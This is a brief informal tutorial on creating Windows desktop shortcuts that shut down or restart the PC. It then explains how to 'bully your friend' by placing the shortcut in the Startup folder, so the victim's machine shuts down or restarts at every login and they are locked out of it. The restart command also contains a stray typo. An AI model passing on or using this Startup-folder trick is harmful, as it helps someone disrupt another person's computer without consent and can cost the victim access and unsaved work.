Tweak to create shutdown and restart option in windows

To shutdown
First right click on desktop

Click on new
Click on new shortcut
Type shutdown -s -t 00
Click on next
Type name
Click on finish

To restart
First right click on desktop
Click on new
Click on new shortcut
Type shutdown -r -t. 0
Click on next
Type name
Click on finish

If u want to bully your friend
You may copy this file in following location

Windows +r
Type %appdata%
Click ok
Double click on microsoft
Double click on windows
Double click on start menu
Double click on programs
Double click on startup
Paste ur file.

It will make system shutdown or restart as soon as user logins
